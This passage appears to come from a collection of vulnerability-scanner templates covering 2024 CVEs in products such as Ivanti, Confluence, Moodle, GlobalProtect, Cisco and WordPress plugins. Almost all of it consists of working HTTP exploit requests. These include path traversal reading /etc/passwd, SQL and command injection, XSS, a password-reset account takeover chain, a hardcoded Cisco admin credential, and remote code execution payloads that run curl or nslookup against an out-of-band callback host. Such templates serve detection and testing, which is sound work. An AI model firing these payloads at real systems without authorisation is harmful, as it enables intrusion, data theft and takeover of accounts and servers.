HTTP/1.1\nHost: {{Hostname}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"Task List\",\"Task ID\",\"Task Name\",\"URL\",\"<title>\u4efb\u52a1\u5217\u8868 | Task List</title>\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /../../../../../../../../../Windows/win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-45388","info":{"name":"Hoverfly < 1.10.3 - Arbitrary File Read","severity":"high"},"requests":[{"raw":["PUT /api/v2/simulation HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"data\":{\"pairs\":[{\"request\":{},\"response\":{\"bodyFile\": \"../../../../../../../etc/passwd\",\"x\":\"aaa\"}} ]},\"meta\":{\"schemaVersion\":\"v5.3\"}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","hoverflyVersion"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-25852","info":{"name":"Linksys RE7000 - Command Injection","severity":"high"},"requests":[{"raw":["PUT /goform/AccessControl HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"AccessPolicy\":\"0\",\"AccessControlList\":\"`ps>/etc_ro/lighttpd/RE7000_www/{{filename}}.txt`\"}\n"]},{"raw":["GET /{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_1,\"result\",\"success\") && contains_all(body_2,\"PID\",\"USER\",\"VSZ\",\"STAT\",\"COMMAND\")","status_code_1 == 200 && status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-2876","info":{"name":"Wordpress Email Subscribers by Icegram Express - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111\n"],"matchers":[{"type":"dsl","dsl":["duration>=4","status_code == 200","contains(header, \"application/json\")","contains_all(body, \"bulk_action\", \"_sent\", \"errortype\")"],"condition":"and"}]}]},{"id":"CVE-2024-20439","info":{"name":"Hardcoded Admin Credentials For Cisco Smart Licensing Utility API","severity":"critical"},"requests":[{"raw":["GET /cslu/v1/scheduler/jobs HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Y3NsdS13aW5kb3dzLWNsaWVudDpMaWJyYXJ5NEMkTFU=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"job_name\":","\"current_status\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-32238","info":{"name":"H3C ER8300G2-X - Password Disclosure","severity":"critical"},"requests":[{"raw":["GET /userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["vtyname","vtypasswd","auxauthmode"],"condition":"and"},{"type":"word","part":"content_type","words":["application/x-unknown"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3822","info":{"name":"Base64 Encoder/Decoder <= 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/base64-encoderdecoder/base64-decode.php?string=PHNjcmlwdD5hbGVydCgiZG9jdW1lbnQuZG9tYWluIik8L3NjcmlwdD4="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<p><script>alert(\\\"document.domain\\\")</script></p>\")"],"condition":"and"}]}]},{"id":"CVE-2024-0337","info":{"name":"Travelpayouts <= 1.1.16 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?travelpayouts_redirect=https://oast.me"],"redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2024-4836","info":{"name":"Edito CMS - Sensitive Data Leak","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["contains_any(body,\"content=\\\"edito\", \"www.edito.pl\")","status_code==200"],"condition":"and","internal":true}]},{"method":"GET","path":["{{BaseURL}}/config.php","{{BaseURL}}/config/config.php","{{BaseURL}}/include/config.php","{{BaseURL}}/includes/config.php"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"db_password\", \"db_username\")","status_code==200"],"condition":"and"}]}]},{"id":"CVE-2024-45241","info":{"name":"CentralSquare CryWolf - Path Traversal","severity":"high"},"requests":[{"raw":["GET /GeneralDocs.aspx?rpt=../../../../Windows/win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"Powered by CryWolf\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /gdoc1.ashx HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\")","contains(content_type,\"application/pdf\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-4295","info":{"name":"Email Subscribers by Icegram Express <= 5.7.20 - Unauthenticated SQL Injection via Hash","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /?es=optin&hash={{ base64(rawhash) }} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5","contains(body, \"You have been successfully subscribed\")"],"condition":"and"}]}]},{"id":"CVE-2024-31850","info":{"name":"CData Arc < 23.4.8839 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["<title>CData Arc"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3742","info":{"name":"Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure","severity":"high"},"requests":[{"raw":["GET /controlloLogin.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, \"application/x-javascript\")","contains(body, \"user==\") && contains(body, \"password==\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","regex":["user\\s*==\\s*'([^']*)'\\s*&&\\s*password\\s*==\\s*'([^']*)'"]}]}]},{"id":"CVE-2024-1380","info":{"name":"Relevanssi (A Better Search) <= 4.22.0 - Query Log Export","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=&relevanssi_export=1\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(header, \"filename=relevanssi_log.csv\", \"application/download\")","contains_all(body, \"user_id\", \"session_id\")"],"condition":"and"}]}]},{"id":"CVE-2024-34351","info":{"name":"Next.js - Server Side Request Forgery (SSRF)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/image?w=16&q=10&url=http://{{interactsh-url}}","{{BaseURL}}/_next/image?w=16&q=10&url=https://{{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["The requested resource isn't a valid image"]}]}]},{"id":"CVE-2024-3400","info":{"name":"GlobalProtect - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n","POST /ssl-vpn/hipreport.esp HTTP/1.1\nHost: {{Hostname}}\nCookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{{randstr}}.txt;\nContent-Type: application/x-www-form-urlencoded\n\nuser=global&portal=global&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=global&computer=global&client-ip=global&client-ipv6=global&md5-sum=global&gwHipReportCheck=global\n","GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 404 && status_code_3 == 403","contains(body_2, 'invalid required input parameters')"],"condition":"and"}]}]},{"id":"CVE-2024-32640","info":{"name":"Mura/Masa CMS - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nobject=displayregion&contenthistid=x\\'&previewid=1\n"],"matchers":[{"type":"dsl","dsl":["status_code == 500","contains(header, \"application/json\")","contains_all(body, \"Unhandled Exception\")","contains_all(header,\"cfid\",\"cftoken\")"],"condition":"and"}]}]},{"id":"CVE-2024-29824","info":{"name":"Ivanti EPM - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /WSStatusEvents/EventHandler.asmx HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/soap+xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soap12:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap12=\"http://www.w3.org/2003/05/soap-envelope\">\n  <soap12:Body>\n    <UpdateStatusEvents xmlns=\"http://tempuri.org/\">\n      <deviceID>string</deviceID>\n      <actions>\n        <Action name=\"string\" code=\"0\" date=\"0\" type=\"96\" user=\"string\" configguid=\"string\" location=\"string\">\n          <status>GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup {{interactsh-url}}'--</status>\n        </Action>\n      </actions>\n    </UpdateStatusEvents>\n  </soap12:Body>\n</soap12:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"content_type","words":["application/soap+xml"]},{"type":"word","part":"body","words":["UpdateStatusEventsResponse"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6924","info":{"name":"TrueBooker <= 1.0.2 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/truebooker-appointment-booking\")"],"internal":true}]},{"raw":["@timeout 20s\nPOST /wp-content/plugins/truebooker-appointment-booking/main/truebooker-service-price.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntba_service_id=(SLEEP(6))\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-6095","info":{"name":"LocalAI - Partial Local File Read","severity":"medium"},"requests":[{"raw":["POST /models/apply HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"url\":\"file:///etc/passwd\"}\n"],"extractors":[{"type":"json","part":"body","name":"uuid","internal":true,"json":[".uuid"]}]},{"raw":["GET /models/jobs/{{uuid}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[": cannot unmarshal !!str `root:x:...`"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-27198","info":{"name":"TeamCity < 2023.11.4 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/hax?jsp=/app/rest/server;.jsp"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"application/xml\")","contains_all(body, \"buildNumber\", \"server version\", \"internalId\")"],"condition":"and"}]}]},{"id":"CVE-2024-20419","info":{"name":"Cisco SSM On-Prem <= 8-202206 - Password Reset Account Takeover","severity":"critical"},"requests":[{"raw":["GET /backend/settings/oauth_adfs?hostname=polar HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["enabled","redirect"],"condition":"and","internal":true}]},{"raw":["POST /backend/reset_password/generate_code HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}\n\n{\"uid\": \"admin\"}\n"],"matchers":[{"type":"word","words":["uid","auth_token"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"auth_token","json":[".auth_token"],"internal":true}]},{"raw":["POST /backend/reset_password HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\nX-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}\n\n{\"uid\": \"admin\",\"auth_token\":\"{{auth_token}}\", \"password\":\"{{password}}\",\"password_confirmation\":\"{{password}}\",\"common_name\":\"\"}\n"],"matchers":[{"type":"word","words":["\"status\":\"OK\""],"condition":"and","internal":true}]},{"raw":["POST /backend/auth/identity/callback HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nX-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}\nContent-Type: application/json\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n"],"matchers":[{"type":"word","part":"body","words":["session_key","role"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2024-7339","info":{"name":"TVT DVR Sensitive Device - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /queryDevInfo HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" encoding=\"utf-8\" ?><request version=\"1.0\" systemType=\"NVMS-9000\" clientType=\"WEB\"/>\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["softwareVersion","eth0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-21683","info":{"name":"Atlassian Confluence Data Center and Server - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{username}}&os_password={{password}}&login=Log+in&os_destination=\n","POST /doauthenticate.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Atlassian-Token: no-check\n\npassword={{password}}&authenticate=Confirm&destination=%2Fadmin%2Fplugins%2Fnewcode%2Faddlanguage.action\n","POST /admin/plugins/newcode/addlanguage.action HTTP/1.1\nHost: {{Hostname}}\nX-Atlassian-Token: no-check\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFcBwsDjo5LkYWGWE\n\n------WebKitFormBoundaryFcBwsDjo5LkYWGWE\nContent-Disposition: form-data; name=\"languageFile\";filename=\"{{randstr}}.js\"\nContent-type: text/javascript\n\nnew java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"curl\",\"{{interactsh-url}}\"]).start()\n------WebKitFormBoundaryFcBwsDjo5LkYWGWE\nContent-Disposition: form-data; name=\"newLanguageName\"\n\n{{randstr}}\n------WebKitFormBoundaryFcBwsDjo5LkYWGWE--\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302 && status_code_2 == 302","contains(interactsh_protocol, 'dns')","contains(body_3, \"confluence\")"],"condition":"and"}]}]},{"id":"CVE-2024-27718","info":{"name":"Smart s200 Management Platform v.S200 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /importexport.php?sql={{base64(cmd)}}&type=exportexcelbysql HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-41107","info":{"name":"Apache CloudStack - SAML Signature Exclusion","severity":"critical"},"requests":[{"raw":["POST /client/api?command=samlSso HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nRelayState=undefined&SAMLResponse={{urlencode(base64(saml))}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header,'sessionkey')","contains(content_type,'text/xml')","status_code==302"],"condition":"and"}]}]},{"id":"CVE-2024-43425","info":{"name":"Moodle - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanchor=&logintoken={{token}}&username={{username}}&password={{password}}\n"],"host-redirects":true,"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["name=\"logintoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]},{"raw":["GET /my/courses.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"sesskey","part":"body","internal":true,"group":1,"regex":["\"sesskey\":\"([^\"]+)\""]}]},{"raw":["POST /lib/ajax/service.php?sesskey={{sesskey}}&info=core_course_get_enrolled_courses_by_timeline_classification HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n[{\"index\":0,\"methodname\":\"core_course_get_enrolled_courses_by_timeline_classification\",\"args\":{\"offset\":0,\"limit\":0,\"classification\":\"all\",\"sort\":\"fullname\",\"customfieldname\":\"\",\"customfieldvalue\":\"\",\"requiredfields\":[\"id\",\"fullname\",\"shortname\",\"showcoursecategory\",\"showshortname\",\"visible\",\"enddate\"]}}]\n"],"extractors":[{"type":"json","part":"body","name":"courseid","json":[".[].data.courses[0].id"],"internal":true}]},{"raw":["POST /question/bank/editquestion/question.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ninitialcategory=1&reload=1&shuffleanswers=1&answernumbering=abc&mform_isexpanded_id_answerhdr=1&noanswers=1&nounits=1&numhints=2&synchronize=&wizard=datasetdefinitions&id=&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&qtype=calculated&makecopy=0&sesskey={{sesskey}}&_qf__qtype_calculated_edit_form=1&mform_isexpanded_id_generalheader=1&mform_isexpanded_id_unithandling=1&mform_isexpanded_id_unithdr=1&mform_isexpanded_id_multitriesheader=1&mform_isexpanded_id_tagsheader=1&category=2%2C11&name=aaaaaaa&questiontext%5Btext%5D=%3Cp%3Edsaszzzzzzzzda%3C%2Fp%3E&questiontext%5Bformat%5D=1&questiontext%5Bitemid%5D=471779994&status=ready&defaultmark=1&generalfeedback%5Btext%5D=&generalfeedback%5Bformat%5D=1&generalfeedback%5Bitemid%5D=318048148&idnumber=&answer%5B0%5D=%281%29-%3E%7Bsystem%28%24_GET%5Bchr%2897%29%5D%29%7D&fraction%5B0%5D=1.0&tolerance%5B0%5D=0.01&tolerancetype%5B0%5D=1&correctanswerlength%5B0%5D=2&correctanswerformat%5B0%5D=1&feedback%5B0%5D%5Btext%5D=&feedback%5B0%5D%5Bformat%5D=1&feedback%5B0%5D%5Bitemid%5D=238751667&unitrole=3&penalty=0.3333333&hint%5B0%5D%5Btext%5D=%3Cp%3Eas%3C%2Fp%3E&hint%5B0%5D%5Bformat%5D=1&hint%5B0%5D%5Bitemid%5D=653998899&hint%5B1%5D%5Btext%5D=&hint%5B1%5D%5Bformat%5D=1&hint%5B1%5D%5Bitemid%5D=161289221&tags=_qf__force_multiselect_submission&submitbutton=Save+changes\n"],"extractors":[{"type":"regex","part":"header","name":"id","group":1,"internal":true,"regex":["&id=([0-9]+)&"]}]},{"raw":["POST /question/bank/editquestion/question.php?wizardnow=datasetdefinitions HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid={{id}}&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&category=2%2C11&wizard=datasetitems&sesskey={{sesskey}}&_qf__question_dataset_dependent_definitions_form=1&dataset%5B0%5D=0&synchronize=0&submitbutton=Next+page\n"],"extractors":[{"type":"regex","part":"header","name":"rceurl","group":1,"internal":true,"regex":["Location: https?://.*?/question/(.*)&returnurl"]}]},{"raw":["GET /question/{{rceurl}}&a=curl%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-23163","info":{"name":"GestSup - Account Takeover","severity":"critical"},"requests":[{"raw":["POST /ajax/ticket_user_db.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: xmlhttprequest\nContent-Type: application/x-www-form-urlencoded\n\nmodifyuser=1&lastname={{lastname}}&firstname={{firstname}}&phone=&mobile=&mail={{email}}&company=111&id=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"success","firstname\":\"{{firstname}}\",\"lastname\":\"{{lastname}}"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}],"extractors":[{"type":"dsl","dsl":["\"Firstname: \"+ firstname","\"Lastname: \"+ lastname"]}]}]},{"id":"CVE-2024-7786","info":{"name":"Sensei LMS < 4.24.2 - Email Template Leak","severity":"high"},"requests":[{"raw":["GET /index.php/wp-json/wp/v2/sensei_email/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"id\",\"date_gmt\",\"slug\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"template_id","json":[".[0].id"],"internal":true}]},{"raw":["GET /index.php/wp-json/wp/v2/sensei_email/{{template_id}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sensei_email_preview_id={{template_id}}","media?parent={{template_id}}"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4358","info":{"name":"Progress Telerik Report Server - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /Startup/Register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUsername={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}}\n","POST /Token HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=password&username={{user}}&password={{pass}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"application/json\")","contains_all(body_2, \"access_token\", \"userName\", \"token_type\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"token","part":"body_2","group":1,"regex":["\"access_token\":\"([A-Z0-9a-z_-]+)\""],"internal":true},{"type":"dsl","dsl":["\"Username: \"+ user","\"Password: \"+ pass"]}]}]},{"id":"CVE-2024-8517","info":{"name":"SPIP BigUp Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["formulaire_action_args","spip"],"condition":"and","internal":true}],"extractors":[{"type":"regex","part":"body","group":1,"name":"formulaire","regex":["name=['\"]formulaire_action_args['\"]\\s*type=['\"]hidden['\"]\\s*value=['\"]([^'\"]+)['\"]"],"internal":true}]},{"raw":["POST /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=5f02b65945d644d6a32847ab130e9586\n\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"page\"\n\nspip_pass\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"lang\"\n\nfr\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"formulaire_action\"\n\noubli\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"formulaire_action_args\"\n\n{{formulaire}}\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"formulaire_action_sign\"\n\n\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"oubli\"\n\n{{email}}\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"nobot\"\n\n\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"bigup_retrouver_fichiers\"\n\na\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"RCE['.system('id').die().']\"; filename=\"{{filename}}.txt\"\nContent-Type: text/plain\n\n{{string}}\n--5f02b65945d644d6a32847ab130e9586--\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=[0-9]+.*gid=[0-9]+.*"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-22024","info":{"name":"Ivanti Connect Secure - XXE","severity":"high"},"requests":[{"raw":["POST /dana-na/auth/saml-sso.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLRequest={{base64(payload)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["/dana-na/","WriteCSS"],"condition":"and"}]}]},{"id":"CVE-2024-5315","info":{"name":"Dolibarr ERP CMS `list.php` - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /htdocs/index.php?mainmenu=home HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginfunction=loginfunction&username={{username}}&password={{password}}\n","GET /htdocs/commande/list.php?viewstatut=x%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["You have an error in your SQL syntax"]},{"type":"word","part":"header_1","words":["Set-Cookie: DOLSESSID_"]},{"type":"word","part":"body_1","words":["SuperAdmin"]}]}]},{"id":"CVE-2024-7029","info":{"name":"AVTECH IP Camera - Command Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/supervisor/Factory.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=white_led&brightness=$(echo%20{{string}}+2>&1)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{string}}"]},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4348","info":{"name":"osCommerce v4.0 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/furniture/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1","{{BaseURL}}/watch/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<ScRiPt>alert('document_domain')</ScRiPt>","Listing of all products on the site"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7340","info":{"name":"W&B Weave Server - Remote Arbitrary File Leak","severity":"high"},"requests":[{"raw":["GET /__weave/file/tmp/weave/fs/../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream","filename=passwd"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7008","info":{"name":"Calibre <= 7.15.0 - Reflected Cross-Site Scripting (XSS)","severity":"medium"},"requests":[{"raw":["GET /browse/book/TEST&quot;;window.stop();alert(document.domain);%2f%2f HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["window.location.href = \"/#book_id=TEST\";window.stop();alert(document.domain);//&panel=book_details"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-29059","info":{"name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","severity":"high"},"requests":[{"raw":["GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.1\nHost: {{Hostname}}\n__RequestVerb: POST\nContent-Type: text/xml\n","POST {{objref}} HTTP/1.1\nHost: {{Hostname}}\nSOAPAction: \"\"\nContent-Type: text/xml\n\n<SOAP-ENV:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:clr=\"http://schemas.microsoft.com/soap/encoding/clr/1.0\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<a1:TextFormattingRunProperties id=\"ref-1\" 